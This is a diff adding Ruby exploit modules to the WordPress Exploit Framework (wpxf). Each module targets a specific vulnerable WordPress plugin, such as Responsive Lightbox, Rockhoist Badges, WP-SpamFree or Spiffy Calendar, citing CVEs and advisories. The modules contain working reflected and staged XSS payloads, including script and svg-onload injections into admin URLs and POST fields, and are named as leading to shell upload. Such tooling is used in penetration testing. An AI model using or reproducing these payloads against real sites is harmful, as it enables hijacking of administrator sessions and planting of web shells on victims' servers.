wpxf 2.0.0a

data/lib/wpxf/modules/exploit/xss/reflected/responsive_lightbox_reflected_xss_shell_upload.rb

@@ -0,0 +1,39 @@
+# frozen_string_literal: true
+
+class Wpxf::Exploit::ResponsiveLightboxReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Responsive Lightbox <= 1.7.1 Reflected XSS Shell Upload',
+      author: [
+        'Chris Liu', # Discovery
+        'rastating'  # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8860'],
+        ['CVE', '2017-2243'],
+        ['URL', 'http://jvn.jp/en/jp/JVN39819446/index.html']
+      ],
+      date: 'Jul 04 2017'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('responsive-lightbox', '1.7.2')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'options-general.php')
+  end
+
+  def url_payload
+    url_encode("\"><svg onload=#{xss_ascii_encoded_include_script}><!--")
+  end
+
+  def url_with_xss
+    "#{vulnerable_url}?page=responsive-lightbox&tab=configuration&section=#{url_payload}"
+  end
+end

data/lib/wpxf/modules/exploit/xss/reflected/rockhoist_badges_reflected_xss_shell_upload.rb

@@ -0,0 +1,41 @@
+# frozen_string_literal: true
+
+class Wpxf::Exploit::RockhoistBadgesReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::StagedReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Rockhoist Badges <= 1.2.2 Reflected XSS Shell Upload',
+      author: [
+        'Larry W. Cashdollar', # Disclosure
+        'rastating'            # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8763'],
+        ['CVE', '2017-6102'],
+        ['URL', 'http://www.vapidlabs.com/advisory.php?v=176']
+      ],
+      date: 'Feb 20 2017'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('rockhoist-badges', '1.2.3')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'edit.php?page=badges')
+  end
+
+  def initial_script
+    create_basic_post_script(
+      vulnerable_url,
+      'add-badge-posted' => '1',
+      'badge-name' => Utility::Text.rand_alpha(5),
+      'badge-desc' => "\\\"><script>#{xss_ascii_encoded_include_script}<\\/script>",
+      'badge-type' => 'gold'
+    )
+  end
+end

data/lib/wpxf/modules/exploit/xss/reflected/sender_reflected_xss_shell_upload.rb

@@ -0,0 +1,20 @@
+
+# frozen_string_literal: true
+
+class Wpxf::Exploit::SenderReflectedXssShellUpload < Wpxf::Exploit::BwsPanelReflectedXssShellUpload
+  def initialize
+    super
+
+    update_info(
+      name: 'Sender <= 1.2.0 Reflected XSS Shell Upload'
+    )
+  end
+
+  def plugin_name
+    'sender'
+  end
+
+  def fixed_version
+    '1.2.0.1'
+  end
+end

data/lib/wpxf/modules/exploit/xss/reflected/simpel_reserveren_reflected_xss_shell_upload.rb

@@ -0,0 +1,34 @@
+# frozen_string_literal: true
+
+class Wpxf::Exploit::SimpelReserverenReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Simpel Reserveren <= 3.5.3 Reflected XSS Shell Upload',
+      author: [
+        'Larry W. Cashdollar', # Discovery
+        'rastating'            # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8461'],
+        ['URL', 'http://www.vapidlabs.com/wp/wp_advisory.php?v=474']
+      ],
+      date: 'Feb 09 2016'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('simpel-reserveren', '3.5.4')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_plugins, 'simpel-reserveren', 'edit.php')
+  end
+
+  def url_with_xss
+    "#{vulnerable_url}?page=%22%3E%3Cscript%3E#{xss_ascii_encoded_include_script}%3C%2Fscript%3E%3C%22"
+  end
+end

data/lib/wpxf/modules/exploit/xss/reflected/simple_slideshow_manager_reflected_xss_shell_upload.rb

@@ -0,0 +1,39 @@
+# frozen_string_literal: true
+
+class Wpxf::Exploit::SimpleSlideshowManagerReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ReflectedXss
+  include ERB::Util
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Simple Slideshow Manager <= 2.3 Reflected XSS Shell Upload',
+      author: [
+        'DefenseCode', # Discovery
+        'rastating'    # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8841'],
+        ['URL', 'http://defensecode.com/advisories/DC-2017-02-016_WordPress_Simple_Slideshow_Manager_Plugin_Advisory.pdf']
+      ],
+      date: 'May 31 2017'
+    )
+  end
+
+  def check
+    check_plugin_version_from_changelog('simple-slideshow-manager', 'readme.txt', '2.4')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'admin.php')
+  end
+
+  def url_payload
+    url_encode("\"></script><script>#{xss_ascii_encoded_include_script}</script>")
+  end
+
+  def url_with_xss
+    "#{vulnerable_url}?page=Acurax-Slideshow-Add-Images&name=#{url_payload}"
+  end
+end

data/lib/wpxf/modules/exploit/xss/reflected/slideshow_gallery_reflected_xss_shell_upload.rb

@@ -0,0 +1,35 @@
+# frozen_string_literal: true
+
+class Wpxf::Exploit::SlideshowGalleryReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Slideshow Gallery <= 1.6.5 Reflected XSS Shell Upload',
+      author: [
+        'DefenseCode <www.defensecode.com>', # Discovery
+        'rastating'                          # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8795'],
+        ['URL', 'http://www.defensecode.com/advisories/DC-2017-01-014_WordPress_Tribulant_Slideshow_Gallery_Plugin_Advisory.pdf']
+      ],
+      date: 'Apr 10 2017'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('slideshow-gallery', '1.6.6')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'admin.php')
+  end
+
+  def url_with_xss
+    "#{vulnerable_url}?page=slideshow-galleries&method=view&id=#{Utility::Text.rand_numeric(2)}"\
+    "%5C%5C%5C%5C%22%3E%3Cscript%3E#{xss_url_and_ascii_encoded_include_script}%3C%2Fscript%3E%3Ca+href%3D%22"
+  end
+end

data/lib/wpxf/modules/exploit/xss/reflected/smart_marketing_xss_shell_upload.rb

@@ -0,0 +1,37 @@
+# frozen_string_literal: true
+
+class Wpxf::Exploit::SmartMarketingReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::StagedReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Smart Marketing SMS and Newsletters Forms < 2.0 Reflected XSS Shell Upload',
+      author: [
+        'Ricardo Sanchez', # Dislosure
+        'rastating'        # WPXF module
+      ],
+      references: [
+        ['CVE', '2017-18010'],
+        ['WPVDB', '8974']
+      ],
+      date: 'Dec 05 2017'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('smart-marketing-for-wp', '2.0')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_plugins, 'smart-marketing-for-wp', 'admin', 'partials', 'custom', 'egoi-for-wp-form_egoi.php')
+  end
+
+  def initial_script
+    create_basic_post_script(
+      vulnerable_url,
+      'url' => "\\\" onload=\\\"#{xss_ascii_encoded_include_script}\\\">"
+    )
+  end
+end

data/lib/wpxf/modules/exploit/xss/reflected/social_buttons_pack_reflected_xss_shell_upload.rb

@@ -0,0 +1,20 @@
+
+# frozen_string_literal: true
+
+class Wpxf::Exploit::SocialButtonsPackReflectedXssShellUpload < Wpxf::Exploit::BwsPanelReflectedXssShellUpload
+  def initialize
+    super
+
+    update_info(
+      name: 'Social Buttons Pack <= 1.1.0 Reflected XSS Shell Upload'
+    )
+  end
+
+  def plugin_name
+    'social-buttons-pack'
+  end
+
+  def fixed_version
+    '1.1.0.1'
+  end
+end

data/lib/wpxf/modules/exploit/xss/reflected/social_login_bws_reflected_xss_shell_upload.rb

@@ -0,0 +1,20 @@
+
+# frozen_string_literal: true
+
+class Wpxf::Exploit::SocialLoginReflectedXssShellUpload < Wpxf::Exploit::BwsPanelReflectedXssShellUpload
+  def initialize
+    super
+
+    update_info(
+      name: 'Social Login <= 0.1 Reflected XSS Shell Upload'
+    )
+  end
+
+  def plugin_name
+    'social-login-bws'
+  end
+
+  def fixed_version
+    '0.1.1'
+  end
+end

data/lib/wpxf/modules/exploit/xss/reflected/social_pug_reflected_xss_shell_upload.rb

@@ -0,0 +1,34 @@
+# frozen_string_literal: true
+
+class Wpxf::Exploit::SocialPugReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Social Share Buttons - Social Pug <= 1.2.5 Reflected XSS Shell Upload',
+      author: [
+        'Tom Adams', # Discovery
+        'rastating'  # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8692'],
+        ['URL', 'http://seclists.org/fulldisclosure/2016/Dec/37']
+      ],
+      date: 'Dec 09 2016'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('social-pug', '1.2.6')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'admin.php')
+  end
+
+  def url_with_xss
+    "#{vulnerable_url}?page=dpsp-toolkit&settings-updated=1&dpsp_message_id=0&dpsp_message_class=%22%3E%3Cscript%3E#{xss_ascii_encoded_include_script}%3C/script%3E"
+  end
+end

data/lib/wpxf/modules/exploit/xss/reflected/sp_project_document_manager_reflected_xss_shell_upload.rb

@@ -0,0 +1,41 @@
+# frozen_string_literal: true
+
+class Wpxf::Exploit::SpProjectDocumentManagerReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::StagedReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'SP Project & Document Manager <= 2.5.9.5 Reflected XSS Shell Upload',
+      author: [
+        'Michael Helwig', # Disclosure
+        'rastating'       # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8409'],
+        ['URL', 'http://www.securityfocus.com/archive/1/537705/30/0/threaded']
+      ],
+      date: 'Mar 06 2016'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('sp-client-document-manager', '2.5.9.6')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_plugins, 'sp-client-document-manager', 'admin', 'ajax.php')
+  end
+
+  def initial_script
+    %|<html><head></head><body><script>
+      #{js_post}
+      post('#{vulnerable_url}?function=email-vendor', {
+        "vendor_email[]": '1',
+        vendor: '<script>#{xss_ascii_encoded_include_script}<\\/script>'
+      });
+    </script></body></html>
+    |
+  end
+end

data/lib/wpxf/modules/exploit/xss/reflected/spamfree_reflected_xss_shell_upload.rb

@@ -0,0 +1,44 @@
+# frozen_string_literal: true
+
+class Wpxf::Exploit::SpamfreeReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::StagedReflectedXss
+
+  def initialize
+    super
+
+    update_info(
+      name: 'WP-SpamFree Anti-Spam Reflected XSS Shell Upload',
+      author: [
+        'Radjnies Bhansingh', # Disclosure
+        'rastating'           # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8752'],
+        ['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_wp_spamfree_anti_spam_wordpress_plugin.html']
+      ],
+      date: 'Mar 02 2017'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('wp-spamfree')
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'options-general.php?page=wp-spamfree%2Fwp-spamfree.php')
+  end
+
+  def initial_script
+    create_basic_post_script(
+      vulnerable_url,
+      'submitted_wpsf_general_options' => '1',
+      'use_alt_cookie_method' => 'on',
+      'comment_logging_all' => 'on',
+      'enhanced_comment_blacklist' => 'on',
+      'wordpress_comment_blacklist' => "</textarea><script>#{xss_ascii_encoded_include_script}<\\/script>",
+      'allow_proxy_users' => 'on',
+      'promote_plugin_link' => 'on',
+      'submit_wpsf_general_options' => 'Update Options'
+    )
+  end
+end

data/lib/wpxf/modules/exploit/xss/reflected/spiffy_calendar_reflected_xss_shell_upload.rb

@@ -0,0 +1,49 @@
+# frozen_string_literal: true
+
+class Wpxf::Exploit::SpiffyCalendarReflectedXssShellUpload < Wpxf::Module
+  include Wpxf::WordPress::ReflectedXss
+  include ERB::Util
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Spiffy Calendar <= 3.2.0 Reflected XSS Shell Upload',
+      author: [
+        'DTSA',      # Discovery
+        'rastating'  # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8842'],
+        ['CVE', '2017-9420'],
+        ['URL', 'https://dtsa.eu/cve-2017-9420-wordpress-spiffy-calendar-v-3-2-0-reflected-cross-site-scripting-xss/']
+      ],
+      date: 'Jun 02 2017'
+    )
+
+    register_option(
+      StringOption.new(
+        name: 'calendar_path',
+        desc: 'The relative path or absolute URL of the calendar',
+        required: true
+      )
+    )
+  end
+
+  def check
+    readme = normalize_uri(wordpress_url_plugins, 'spiffy-calendar', 'readme.txt')
+    check_version_from_custom_file(readme, /=\sVersion\s((\d+\.?)+).+?=/, '3.3')
+  end
+
+  def vulnerable_url
+    normalize_relative_uri(datastore['calendar_path'])
+  end
+
+  def url_payload
+    url_encode("#{DateTime.now.year}\"><script>#{xss_ascii_encoded_include_script}</script>")
+  end
+
+  def url_with_xss
+    "#{vulnerable_url}?month=#{Utility::Text.rand_month[0..2]}&yr=#{url_payload}"
+  end
+end